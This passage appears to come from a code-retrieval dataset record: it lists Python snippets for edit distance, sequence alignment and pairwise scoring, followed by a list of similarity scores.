 "def testEditDist(self): # - - - - - - - - - - - - - - - - - - - - - - - - -\n\n for pair in self.string_pairs:\n\n approx_str_value = stringcmp.editdist(pair[0],pair[1])\n\n assert (isinstance(approx_str_value,float)), \\\n '\"EditDist\" does not return a floating point number for: '+ \\\n str(pair)\n\n assert (approx_str_value >= 0.0), \\\n '\"EditDist\" returns a negative number for: '+str(pair)\n\n assert (approx_str_value <= 1.0), \\\n '\"EditDist\" returns a number larger than 1.0 for: '+str(pair)\n\n approx_str_value_1 = stringcmp.editdist(pair[0],pair[1])\n approx_str_value_2 = stringcmp.editdist(pair[1],pair[0])\n\n assert (approx_str_value_1 == approx_str_value_2), \\\n '\"EditDist\" returns different values for pair and swapped ' + \\\n 'pair: '+str(pair)+': '+str(approx_str_value_1)+', '+ \\\n str(approx_str_value_2)\n\n # Check for value 1.0 if the strings are the same\n #\n if (pair[0] == pair[1]):\n\n assert (approx_str_value == 1.0), \\\n '\"EditDist\" does not return 1.0 if strings are equal: '+ \\\n str(pair)",
 "def align(s0, s1, backptr): # Arranges them to get the best matching of letters\r\n\r\n # Empty array to fill in and return\r\n result = ['','']\r\n # Turn the strings into easier-to-handle arrays\r\n x0 = [char for char in s0]\r\n x1 = [char for char in s1]\r\n # empty arrays to put the aligned letters and the spaces into\r\n ress0 = []\r\n ress1 = []\r\n\r\n rows = len(s0)\r\n columns = len(s1)\r\n\r\n # Create the bottom values in the backptr matrix so we know when we are done\r\n backptr[0][0][0] = -1\r\n backptr[0][0][1] = -1\r\n\r\n # initial values for where in the backptr matrix we are and where we came from\r\n staterow = rows\r\n statecol = columns\r\n r = staterow\r\n c = statecol\r\n # it follows the pointers until it reaches the bottom\r\n while staterow >=0 and statecol >=0:\r\n # If it points diagonally\r\n if backptr[staterow][statecol][0] == staterow-1 and backptr[staterow][statecol][1] == statecol-1 :\r\n if staterow == 0 and statecol == 0: # if it is at the bottom, pass\r\n pass\r\n else:\r\n # otherwise store both letters at the same position in result\r\n ress0.insert(0,x0[staterow-1])\r\n ress1.insert(0,x1[statecol-1])\r\n # If it points left (same row)\r\n if backptr[staterow][statecol][0] == staterow:\r\n if staterow == 0 and statecol == 0: # if it is at the bottom, pass\r\n pass\r\n else:\r\n # otherwise it spaces the row and inserts the letter in the column\r\n ress0.insert(0,\" \")\r\n ress1.insert(0,x1[statecol-1])\r\n # If it points up (same column)\r\n if backptr[staterow][statecol][1] == statecol:\r\n if staterow == 0 and statecol == 0: # if it is at the bottom, pass\r\n pass\r\n else:\r\n # otherwise it spaces the column and inserts the letter in the row\r\n ress0.insert(0,x0[staterow-1])\r\n ress1.insert(0,\" \")\r\n\r\n # so as not to overwrite staterow during the re-initialisation\r\n r = staterow\r\n c = statecol\r\n # initialise the new state (follow the pointer)\r\n staterow = backptr[r][c][0]\r\n statecol = backptr[r][c][1]\r\n\r\n # the print function wants the string reversed....\r\n ress0.reverse()\r\n ress1.reverse()\r\n # concat the arrays back into a string\r\n sum0 =''.join(ress0)\r\n sum1 =''.join(ress1)\r\n # put them into the result\r\n result[0]=sum0\r\n result[1]=sum1\r\n\r\n return(result)",
 "def compute_local_alignment(seq_x,seq_y,scoring_matrix,alignment_matrix):\n best_score = 0\n len_m, len_n = len(seq_x), len(seq_y)\n best_i = 0\n best_j = 0\n x_ret, y_ret = '', ''\n for idx_i in range(len_m+1):\n for idx_j in range(len_n+1):\n if alignment_matrix[idx_i][idx_j] > best_score:\n best_score = alignment_matrix[idx_i][idx_j]\n best_i = idx_i\n best_j = idx_j\n idx_i = best_i\n idx_j = best_j\n while idx_i != 0 and idx_j != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n if alignment_matrix[idx_i][idx_j] == (alignment_matrix[idx_i-1][idx_j-1] +\n scoring_matrix[seq_x[idx_i-1]][seq_y[idx_j-1]]):\n # score from diagonal cell\n x_ret = (seq_x[idx_i-1]) + x_ret\n y_ret = (seq_y[idx_j-1]) + y_ret\n idx_i -= 1\n idx_j -= 1\n elif alignment_matrix[idx_i][idx_j] == (alignment_matrix[idx_i-1][idx_j] +\n scoring_matrix[seq_x[idx_i-1]]['-']):\n # score from above cell\n x_ret = (seq_x[idx_i - 1]) + x_ret\n y_ret = ('-') + y_ret\n idx_i -= 1\n else:\n # score from left cell\n x_ret = ('-') + x_ret\n y_ret = (seq_y[idx_j - 1]) + y_ret\n idx_j -= 1\n while idx_i != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n\n # idx_j = 0, move upward along first column\n x_ret = (seq_x[idx_i - 1]) + x_ret\n y_ret = ('-') + y_ret\n idx_i -= 1\n while idx_j != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n\n # idx_i = 0, move left along first row\n x_ret = ('-') + x_ret\n y_ret = (seq_y[idx_j - 1]) + y_ret\n idx_j -= 1\n return (best_score, x_ret, y_ret)",
 "def get_all_distances(cls, indices, dist_mat):\n distances = []\n for i, j in combinations(indices, 2):\n distances.append(cls.get_dist(dist_mat, i, j))\n return distances",
 "def pair_hmm_align_unaligned_seqs(seqs, moltype=DNA_cogent, params={}):\r\n\r\n seqs = LoadSeqs(data=seqs, moltype=moltype, aligned=False)\r\n try:\r\n s1, s2 = seqs.values()\r\n except ValueError:\r\n raise ValueError(\r\n \"Pairwise aligning of seqs requires exactly two seqs.\")\r\n\r\n try:\r\n gap_open = params['gap_open']\r\n except KeyError:\r\n gap_open = 5\r\n try:\r\n gap_extend = params['gap_extend']\r\n except KeyError:\r\n gap_extend = 2\r\n try:\r\n score_matrix = params['score_matrix']\r\n except KeyError:\r\n score_matrix = make_dna_scoring_dict(\r\n match=1, transition=-1, transversion=-1)\r\n\r\n return local_pairwise(s1, s2, score_matrix, gap_open, gap_extend)",
 "def pairwiseScore(seq1, seq2, matrix):\n \n gap = -4.0\n incr_top = 0\n incr_bottom = 0\n pairwise_score = 0\n for i,j in zip(range(len(seq1)), range(len(seq2))):\n aa1 = seq1[i]\n aa2 = seq2[j] \n if aa1==\"-\" and aa2 ==\"-\" :\n pairwise_score += 0\n elif aa1!=\"-\" and aa2!=\"-\":\n pairwise_score += float(matchScore(aa1, aa2, matrix))\n elif aa1==\"-\" and aa2!=\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11==\"-\" and aa22!=\"-\":\n incr_top += 1\n else: \n pairwise_score += gap + incr_top * incr_top\n incr_top = 0\n except: \n pairwise_score += gap\n pass\n elif aa1!=\"-\" and aa2==\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11!=\"-\" and aa22==\"-\":\n incr_bottom += 1\n else: \n pairwise_score += gap + incr_bottom * incr_bottom\n incr_bottom = 0\n except: \n pairwise_score += gap\n pass\n else: pass\n \n return pairwise_score"
]
[ "0.7585912", "0.65193325", "0.6018155", "0.5973261", "0.5960617", "0.5927266", "0.5902716", "0.5879615", "0.5879615", "0.5809641", "0.57759446", "0.5760104", "0.57229745", "0.5714925", "0.5702276", "0.5691489", "0.5681923", "0.5659949", "0.5631824", "0.56016165", "0.55863863", "0.558498", "0.55749315", "0.5506777", "0.54895747", "0.5479255", "0.5467247", "0.544265", "0.5356773", "0.5319879", "0.5309216", "0.5259449", "0.52525043", "0.5246517", "0.5223466", "0.5213233", "0.5211989", "0.52022827", "0.52016515", "0.5182729", "0.51753944", "0.5141377", "0.5139009", "0.5135867", "0.5133956", "0.51284134", "0.5103685", "0.50989443", "0.50973517", "0.5095779", "0.5081928", "0.50803125", "0.5065106", "0.50647897", "0.50488794", "0.50365704", "0.5035186", "0.5022366", "0.5016601", "0.5016086", "0.5015436", "0.5005177", "0.49978912", "0.4986173", "0.49556008", "0.49533147", "0.49445862", "0.4925716", "0.49223873", "0.49129793", "0.4894045", "0.4881723", "0.48802066", "0.4873834", "0.48678797", "0.48526466", "0.48401457", "0.48279247", "0.48153195", "0.48143938", "0.47867844", "0.47863838", "0.47752634", "0.477023", "0.47686982", "0.476483", "0.47610417", "0.47438693", "0.47421327", "0.4742066", "0.474166", "0.47412723", "0.47359058", "0.47282383", "0.4703133", "0.4701113", "0.46949562", "0.46876642", "0.46872383", "0.46846431" ]
0.7149528
1
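The edit-distance negative at the top of this record reasons through three cases at each step — insertion in string1, deletion in string1, or substitution — and takes the minimum of the three. As a minimal self-contained sketch of that recurrence (the memoized wrapper, the base cases, the match short-circuit, and the test strings are assumptions added for illustration, not part of the retrieved snippet):

```python
from functools import lru_cache

def edit_distance(str1, str2):
    # Memoized form of the three-case recurrence described above.
    @lru_cache(maxsize=None)
    def calc(pos1, pos2):
        # Base cases (assumed): if one string is exhausted, the cost
        # is the number of characters remaining in the other.
        if pos1 == 0:
            return pos2
        if pos2 == 0:
            return pos1
        if str1[pos1 - 1] == str2[pos2 - 1]:
            return calc(pos1 - 1, pos2 - 1)  # match: no cost
        # insertion in string1 / deletion in string1 / substitution
        return 1 + min(calc(pos1, pos2 - 1),
                       calc(pos1 - 1, pos2),
                       calc(pos1 - 1, pos2 - 1))

    return calc(len(str1), len(str2))

assert edit_distance("kitten", "sitting") == 3
```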
This function works OK on its own. Wrapping it with the above Python function was a workaround because joblib and multiprocessing seem to have an issue retaining default arguments with numba functions.
def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n\n mx_L = nb.int_(np.max(seqs_L))\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n\n """As long as ldmat is big enough to accommodate the largest sequence\n it's OK to only use part of it for the smaller sequences\n NOTE that to create a 2D array it must be created 1D and reshaped"""\n ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L))\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n\n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n """No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert the same number of gaps in both sequences"""\n #tmp_dist = 0\n for i in range(q_L):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]]\n #dist[ind_i] = tmp_dist\n continue\n\n """Do not need to re-zero each time"""\n # ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n\n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution\n dist[ind_i] = ldmat[row, col]\n return dist
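The query/document pair above describes a workaround worth spelling out: resolve the numba kernel's default arguments in a plain Python wrapper before anything is handed to joblib or multiprocessing, so no worker ever depends on a numba function's defaults surviving serialization. A minimal sketch of that pattern (the wrapper name and the joblib call are assumptions for illustration; only `_nb_vector_editdistance` and `identity_nb_distance_matrix` come from the record above):

```python
def nb_vector_editdistance(indices, seqs_mat, seqs_L,
                           distance_matrix=None, gap_penalty=1):
    # Plain-Python wrapper: pin the defaults eagerly here, then pass
    # every argument to the numba kernel explicitly, so joblib /
    # multiprocessing never rely on the kernel's own defaults.
    if distance_matrix is None:
        distance_matrix = identity_nb_distance_matrix
    return _nb_vector_editdistance(indices, seqs_mat, seqs_L,
                                   distance_matrix, gap_penalty)
```

With the defaults pinned, a call such as `joblib.Parallel(n_jobs=4)(joblib.delayed(nb_vector_editdistance)(chunk, seqs_mat, seqs_L) for chunk in index_chunks)` ships only concrete arguments to each worker.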
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_default_args(self):\n cfunc = njit(g)\n self.assertEqual(cfunc(1, 2, 3), g(1, 2, 3))\n self.assertEqual(cfunc(1, y=2, z=3), g(1, 2, 3))", "def __call__(self, *args, **kwargs):\n if Numba.numba_flag:\n return self.numba_fn(*args, **kwargs)\n else:\n return self.function(*args, **kwargs)", "def njit(func):\n return func", "def precompile_numba(self):\n\n t0 = time.time()\n\n # a. remember actual settings\n prev = dict()\n varnames = ['T','Nm','do_print','Nm_ret','Na_ret']\n for varname in varnames:\n prev[varname] = getattr(self.par,varname)\n\n # b. fast settings\n self.par.T = 2\n self.par.Nm_ret = 20\n self.par.Na_ret = 10\n self.par.Nm = 5\n self.par.do_print = False\n self.allocate()\n\n # c. solve\n self.solve()\n\n # d. reset\n for varname in varnames:\n setattr(self.par,varname,prev[varname]) \n\n self.allocate()\n\n if self.par.do_print:\n print(f'pre-compiled numba in {time.time()-t0:.2f} secs')", "def _make_one_arg_numba_func(func, func_args):\n try:\n func_numba = numba.jit(func, nopython=True)\n\n @numba.jit(nopython=True)\n def f(x, args=()):\n return func_numba(x, *args)\n\n # Attempt function call\n _ = f(np.array([1.0, 2.0]), func_args)\n\n return f, True\n except:\n\n def f(x, args=()):\n return func(x, *args)\n\n return f, False", "def parallel_func(func, n_jobs, verbose=None, max_nbytes='auto'):\n # for a single job, we don't need joblib\n if n_jobs == 1:\n n_jobs = 1\n my_func = func\n parallel = list\n return parallel, my_func, n_jobs\n\n try:\n from joblib import Parallel, delayed\n except ImportError:\n try:\n from sklearn.externals.joblib import Parallel, delayed\n except ImportError:\n warn('joblib not installed. Cannot run in parallel.')\n n_jobs = 1\n my_func = func\n parallel = list\n return parallel, my_func, n_jobs\n\n # check if joblib is recent enough to support memmaping\n p_args = _get_args(Parallel.__init__)\n joblib_mmap = ('temp_folder' in p_args and 'max_nbytes' in p_args)\n\n cache_dir = get_config('MNE_CACHE_DIR', None)\n if isinstance(max_nbytes, string_types) and max_nbytes == 'auto':\n max_nbytes = get_config('MNE_MEMMAP_MIN_SIZE', None)\n\n if max_nbytes is not None:\n if not joblib_mmap and cache_dir is not None:\n warn('\"MNE_CACHE_DIR\" is set but a newer version of joblib is '\n 'needed to use the memmapping pool.')\n if joblib_mmap and cache_dir is None:\n logger.info('joblib supports memapping pool but \"MNE_CACHE_DIR\" '\n 'is not set in MNE-Python config. To enable it, use, '\n 'e.g., mne.set_cache_dir(\\'/tmp/shm\\'). 
This will '\n 'store temporary files under /dev/shm and can result '\n 'in large memory savings.')\n\n # create keyword arguments for Parallel\n kwargs = {'verbose': 5 if logger.level <= logging.INFO else 0}\n\n if joblib_mmap:\n if cache_dir is None:\n max_nbytes = None # disable memmaping\n kwargs['temp_folder'] = cache_dir\n kwargs['max_nbytes'] = max_nbytes\n\n n_jobs = check_n_jobs(n_jobs)\n parallel = Parallel(n_jobs, **kwargs)\n my_func = delayed(func)\n return parallel, my_func, n_jobs", "def test_named_args(self):\n cfunc = njit(f)\n self.assertEqual(cfunc(1, 2, 3), f(1, 2, 3))\n self.assertEqual(cfunc(1, y=2, z=3), f(1, 2, 3))", "def _make_two_arg_numba_func(func, func_args):\n try:\n func_numba = numba.jit(func, nopython=True)\n\n @numba.jit(nopython=True)\n def f(x, args=()):\n return func_numba(x, *args)\n\n # Attempt function call\n _ = f(np.array([1.0, 2.0]), np.array([1.0, 2.0]), func_args)\n\n return f, True\n except:\n\n def f(x, y, args=()):\n return func(x, y, *args)\n\n return f, False", "def generate_numba_apply_func(\n func: Callable[..., Scalar],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_apply(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ) -> np.ndarray:\n result = np.empty(len(begin))\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window))\n if len(window) - count_nan >= minimum_periods:\n result[i] = numba_func(window, *args)\n else:\n result[i] = np.nan\n return result\n\n return roll_apply", "def IB(px,py,pyx_c,maxbeta=5,numbeta=30,iterations=100,restarts=3,parallel = False):\n pm_size = px.size\n bs = np.linspace(0.01,maxbeta,numbeta) #value of beta\n if parallel != False:\n pool = mp.Pool(processes=parallel)\n results = [pool.apply_async(beta_iter,args=(b,px,py,pyx_c,pm_size,restarts,iterations,)) for b in bs]\n pool.close()\n results = [p.get() for p in results]\n ips = [x[0] for x in results]\n ifs = [x[1] for x in results]\n #Values of beta may not be sorted appropriately, code below sorts ipast and ifuture according to their corresponding value of beta, and in correct order\n b_s = [x[2] for x in results] \n ips = [x for _, x in sorted(zip(b_s,ips))]\n ifs = [x for _, x in sorted(zip(b_s,ifs))]\n elif parallel == False:\n\t ips = np.zeros(bs.size)\n\t ifs = np.zeros(bs.size)\n\t for bi in range(bs.size):\n\t\t candidates = []\n\t\t for r in range(restarts):\n\t\t\t # initialize distribution for bottleneck variable\n\t\t\t pm = np.random.rand(pm_size)+1\n\t\t\t pm /= pm.sum()\n\t\t\t pym_c = np.random.rand(py.size,pm.size)+1 # Starting point for the algorithm\n\t\t\t pym_c /= pym_c.sum(axis=0)\n\t\t\t\t# iterate the BA algorithm\n\t\t\t for i in range(iterations):\n\t\t\t\t pmx_c, z = p_mx_c(pm,px,py,pyx_c,pym_c,bs[bi])\n\t\t\t\t pm = p_m(pmx_c,px)\n\t\t\t\t pym_c = p_ym_c(pm,px,py,pyx_c,pmx_c)\n\t\t\t\t if i>0 and np.allclose(pmx_c,pmx_c_old,rtol=1e-3,atol=1e-3):\n\t\t\t\t\t\t# if the x->m mapping is not updating any more, we're at convergence and we can stop\n\t\t\t\t\t break\n\t\t\t\t pmx_c_old = pmx_c\n\t\t\t candidates.append({'past_info' : mi_x1x2_c(pm, px, pmx_c),\n\t\t\t\t\t\t\t\t 'future_info' : mi_x1x2_c(py, pm, pym_c),\n\t\t\t\t\t\t\t\t 'functional' : -np.log2(np.inner(z,px))})\n\t\t\t# 
among the restarts, select the result that gives the minimum\n\t\t\t# value for the functional we're actually minimizing (eq 29 in\n\t\t\t# Tishby et al 2000).\n\t\t selected_candidate = min(candidates, key=lambda c: c['functional'])\n\t\t ips[bi] = selected_candidate['past_info']\n\t\t ifs[bi] = selected_candidate['future_info']\n # restrict the returned values to those that, at each value of\n # beta, actually increase (for Ipast) and do not decrease (for\n # Ifuture) the information with respect to the previous value of\n # beta. This is to avoid confounds from cases where the AB\n # algorithm gets stuck in a local minimum.\n ub, bs = compute_upper_bound(ips, ifs, bs)\n ips = np.squeeze(ub[:,0])\n ifs = np.squeeze(ub[:,1])\n return ips, ifs, bs", "def paramap(func, in_list, out_shape=None, n_jobs=-1, engine=\"joblib\",\n backend=None, func_args=None, func_kwargs=None,\n **kwargs):\n\n func_args = func_args or []\n func_kwargs = func_kwargs or {}\n\n if engine == \"joblib\":\n if not has_joblib:\n raise joblib()\n if backend is None:\n backend = \"loky\"\n pp = joblib.Parallel(\n n_jobs=n_jobs, backend=backend,\n **kwargs)\n dd = joblib.delayed(func)\n d_l = [dd(ii, *func_args, **func_kwargs) for ii in in_list]\n results = pp(tqdm(d_l))\n\n elif engine == \"dask\":\n if not has_dask:\n raise dask()\n if backend is None:\n backend = \"threading\"\n\n if n_jobs == -1:\n n_jobs = multiprocessing.cpu_count()\n n_jobs = n_jobs - 1\n\n def partial(func, *args, **keywords):\n def newfunc(in_arg):\n return func(in_arg, *args, **keywords)\n return newfunc\n pp = partial(func, *func_args, **func_kwargs)\n dd = [dask.delayed(pp)(ii) for ii in in_list]\n if backend == \"multiprocessing\":\n results = dask.compute(*dd, scheduler=\"processes\",\n workers=n_jobs, **kwargs)\n elif backend == \"threading\":\n results = dask.compute(*dd, scheduler=\"threads\",\n workers=n_jobs, **kwargs)\n else:\n raise ValueError(\"%s is not a backend for dask\" % backend)\n\n if engine == \"ray\":\n if not has_ray:\n raise ray()\n\n func = ray.remote(func)\n results = ray.get([func.remote(ii, *func_args, **func_kwargs)\n for ii in in_list])\n\n elif engine == \"serial\":\n results = []\n for in_element in in_list:\n results.append(func(in_element, *func_args, **func_kwargs))\n\n if out_shape is not None:\n return np.array(results).reshape(out_shape)\n else:\n return results", "def __call__(self, *args, **kwargs):\n dprint(2, \"FunctionMetadata::__call__\", self.func.__name__, args, kwargs, self.numba_args)\n atypes = tuple([type(x) for x in args])\n try_again = True\n count = 0\n if not self.numba_pfunc:\n if len(self.numba_args) == 0 and not self.no_global_cache:\n self.numba_pfunc = get_fm(FillerFunc(self.func), True)\n self.numba_func = get_fm(FillerFunc(self.func), False)\n else:\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n\n if gpu_present:\n dprint(1, \"using gpu context\")\n\n with dpctl.device_context(\"level0:gpu\"):\n while try_again and count < 2:\n count += 1\n try_again = False\n if self.ngfunc.get(atypes, True):\n try:\n ret = self.numba_pfunc(*args, **kwargs)\n self.ngfunc[atypes] = True\n return ret\n except numba.core.errors.TypingError as te:\n tetxt = str(te)\n tesplit = tetxt.splitlines()\n for teline in tesplit:\n if \"Untyped global name\" in teline and \"ramba.StencilMetadata\" in teline:\n try_again = True\n # Name of global that is of type ramba.StencilMetadata\n tes = teline[21:].split()[0][:-2]\n 
outer_globals = self.func.__globals__\n outer_locals = {}\n etes = eval(tes, outer_globals, outer_locals)\n etes.compile() # Converts to a Numba StencilFunc\n outer_globals[tes] = etes.sfunc # Rewrite the global to the Numba StencilFunc\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n if not try_again:\n self.ngfunc[atypes] = False\n dprint(1, \"Numba GPU ParallelAccelerator attempt failed.\")\n except:\n self.ngfunc[atypes] = False\n dprint(1, \"Numba GPU ParallelAccelerator attempt failed.\")\n\n while try_again and count < 2:\n count += 1\n try_again = False\n if self.npfunc.get(atypes, True):\n try:\n ret = self.numba_pfunc(*args, **kwargs)\n self.npfunc[atypes] = True\n return ret\n except numba.core.errors.TypingError as te:\n tetxt = str(te)\n tesplit = tetxt.splitlines()\n for teline in tesplit:\n if \"Untyped global name\" in teline and \"ramba.StencilMetadata\" in teline:\n try_again = True\n # Name of global that is of type ramba.StencilMetadata\n tes = teline[21:].split()[0][:-2]\n outer_globals = self.func.__globals__\n outer_locals = {}\n etes = eval(tes, outer_globals, outer_locals)\n etes.compile() # Converts to a Numba StencilFunc\n outer_globals[tes] = etes.sfunc # Rewrite the global to the Numba StencilFunc\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n if not try_again:\n self.npfunc[atypes] = False\n dprint(1, \"Numba ParallelAccelerator attempt failed.\")\n except:\n self.npfunc[atypes] = False\n dprint(1, \"Numba ParallelAccelerator attempt failed.\")\n\n if self.nfunc.get(atypes, True):\n try:\n ret = self.numba_func(*args, **kwargs)\n self.nfunc[atypes] = True\n dprint(3, \"Numba attempt succeeded.\")\n return ret\n except numba.core.errors.TypingError as te:\n print(\"Ramba TypingError:\", te, type(te))\n self.npfunc[atypes] = False\n dprint(1, \"Numba attempt failed.\")\n except:\n self.nfunc[atypes] = False\n dprint(1, \"Numba attempt failed.\")\n raise\n\n return self.func(*args, **kwargs)", "def jit(func):\n return func", "def conditional_jit(_func=None, **kwargs):\n if _func is None:\n return lambda fn: functools.wraps(fn)(maybe_numba_fn(fn, **kwargs))\n else:\n lazy_numba = maybe_numba_fn(_func, **kwargs)\n return functools.wraps(_func)(lazy_numba)", "def vectorize_par(\n f: Callable, inputs: Iterable,\n pool: Pool = None, processes=None, chunksize=1,\n nout=None, otypes: Union[Sequence[Type], Type] = None,\n use_starmap=True, meshgrid_input=True,\n) -> Tuple[Union[Mapping[Any, Any], np.ndarray, Sequence[Any]], ...]:\n if isinstance(inputs, dict):\n raise NotImplementedError()\n # s = dict(signature(f).parameters)\n # ks, ds = zip(*[(k, v.default) for k, v in s.items()])\n # inputs = [inputs[k] if k in inputs else arrayobj1d([d]) for k, d in zip(ks, ds)]\n\n if meshgrid_input:\n inputs = [\n inp if (isinstance(inp, np.ndarray) and type(inp[0]) is object)\n else (arrayobj1d(inp) if is_iter(inp)\n else arrayobj1d([inp]))\n for inp in inputs]\n shape0 = [len(inp) for inp in inputs]\n mesh_inputs = np.meshgrid(*inputs, indexing='ij') # type: Iterable[np.ndarray]\n else:\n inputs = [arrayobj1d([inp]) if not is_iter(inp) else inp for inp in inputs]\n shape0 = broadcast_shapes(*[npy(v).shape for v in inputs])\n mesh_inputs = [np.broadcast_to(v, shape0) for v in inputs]\n mesh_inputs = [m.flatten() for m in mesh_inputs]\n\n m = zip(*mesh_inputs)\n m = [m1 for m1 in m]\n\n if pool is 
None:\n pool = Pool(processes=processes) # type: PoolParallel\n\n # if processes == 0:\n # use_starmap = False\n\n if chunksize is None:\n # NOTE: this doesn't seem to work well, unlike chunksize=1.\n # Need further experiment.\n chunksize = np.max([\n int(np.floor(np.prod(shape0) / pool._processes)),\n 1\n ])\n\n if use_starmap:\n try:\n outs = pool.starmap(f, m, chunksize=chunksize)\n except EOFError:\n print('EOFError from starmap! Trying again..')\n # Just try again - this seems to fix the issue\n try:\n outs = pool.starmap(f, m, chunksize=chunksize)\n except EOFError:\n print('EOFError again after trying again.. '\n 'Not trying again this time.')\n raise\n else:\n outs = pool.map(f, m, chunksize=chunksize)\n\n if nout is None:\n if otypes is not None and is_sequence(otypes):\n nout = len(otypes)\n else:\n try:\n nout = len(outs[0])\n except TypeError:\n nout = 1\n\n if otypes is None:\n otypes = [object] * nout\n elif not is_sequence(type(otypes)):\n otypes = [otypes] * nout\n\n # NOTE: deliberately keeping outs, outs1, and outs2 for debugging.\n # After confirming everything works well, rename all to \"outs\"\n # to save memory.\n # DEF: outs1[argout][i_input_flattened]\n if nout > 1:\n outs1 = zip(*outs)\n else:\n if use_starmap:\n outs1 = [outs]\n else:\n # Reverse the action of map() putting each output in a list\n outs1 = [[out1[0] for out1 in outs]]\n\n # --- outs2: reshape to inputs' dimensions\n # DEF: outs2[argout][i_input1, i_input2, ...]\n outs2 = [arrayobj1d(out).reshape(shape0) for out in outs1]\n\n # --- outs3: set to a correct otype\n # DEF: outs3[argout][i_input1, i_input2, ...]\n outs3 = [cell2mat(out, otype) if otype not in [object, object]\n else out\n for out, otype in zip(outs2, otypes)]\n return tuple(outs3)", "def default_numba_nopython_pipeline(state, pm):\n if state.func_ir is None:\n pm.add_pass(TranslateByteCode, \"analyzing bytecode\")\n pm.add_pass(FixupArgs, \"fix up args\")\n pm.add_pass(IRProcessing, \"processing IR\")\n pm.add_pass(WithLifting, \"Handle with contexts\")\n\n # this pass adds required logic to overload default implementation of\n # Numpy functions\n pm.add_pass(DPPLAddNumpyOverloadPass, \"dppl add typing template for Numpy functions\")\n\n # Add pass to ensure when users are allocating static\n # constant memory the size is a constant and can not\n # come from a closure variable\n pm.add_pass(DPPLConstantSizeStaticLocalMemoryPass, \"dppl constant size for static local memory\")\n\n # pre typing\n if not state.flags.no_rewrites:\n pm.add_pass(RewriteSemanticConstants, \"rewrite semantic constants\")\n pm.add_pass(DeadBranchPrune, \"dead branch pruning\")\n pm.add_pass(GenericRewrites, \"nopython rewrites\")\n\n pm.add_pass(InlineClosureLikes,\n \"inline calls to locally defined closures\")\n # convert any remaining closures into functions\n pm.add_pass(MakeFunctionToJitFunction,\n \"convert make_function into JIT functions\")\n # inline functions that have been determined as inlinable and rerun\n # branch pruning, this needs to be run after closures are inlined as\n # the IR repr of a closure masks call sites if an inlinable is called\n # inside a closure\n pm.add_pass(InlineInlinables, \"inline inlinable functions\")\n if not state.flags.no_rewrites:\n pm.add_pass(DeadBranchPrune, \"dead branch pruning\")\n\n pm.add_pass(FindLiterallyCalls, \"find literally calls\")\n pm.add_pass(LiteralUnroll, \"handles literal_unroll\")\n\n if state.flags.enable_ssa:\n pm.add_pass(ReconstructSSA, \"ssa\")\n # typing\n pm.add_pass(NopythonTypeInference, 
\"nopython frontend\")\n pm.add_pass(AnnotateTypes, \"annotate types\")\n\n # strip phis\n pm.add_pass(PreLowerStripPhis, \"remove phis nodes\")\n\n # optimisation\n pm.add_pass(InlineOverloads, \"inline overloaded functions\")", "def __call__(self, par_dict: dict) -> np.ndarray:", "def vectorize(func, processes=1, on_complete=None):\n if processes > 1:\n return __multiprocess_wrapper(func, processes, on_complete)\n else:\n return single_process_wrapper(func, on_complete)", "def job_as_parameter(f):\n f.job_as_parameter = True\n return f", "def _seed_numba(seed):\n np.random.seed(seed)", "def Optimise(LogLikelihood,par,func_args,fixed=None,type='max',method='NM',maxiter=10000, maxfun=10000, verbose=True):\n \n if fixed==None:\n var_par = np.copy(par)\n #otherwise construct the parameter vector from var_par and fixed_par_val\n else:\n par = np.array(par)\n fixed = np.array(fixed) #ensure fixed is a np array\n #assign parameters to normal param vector\n fixed_par = par[np.where(fixed==True)]\n var_par = par[np.where(fixed!=True)]\n \n #set the algorithm to use - CG and P not working (at least not well)\n add_kwords = {'verbose':verbose}\n if method == 'NM':\n Algorithm = NelderMead\n add_kwords = {'maxiter':maxiter, 'maxfun':maxfun,'verbose':verbose}\n elif method == 'CG':\n print \"warning: CG method didn't work properly during testing\"\n Algorithm = ConjugateGradient\n elif method == 'P':\n print \"warning: Powell algorithm didn't work properly during testing\"\n Algorithm = Powell\n else:\n print \"error: optimisation function not found\"\n return par\n \n #set the optimisation function to pos or neg for the fmin funcitons\n if type == 'max': OptFunc = NegFixedPar_func\n elif type == 'min': OptFunc = FixedPar_func\n else:\n print \"error: %s not a valid 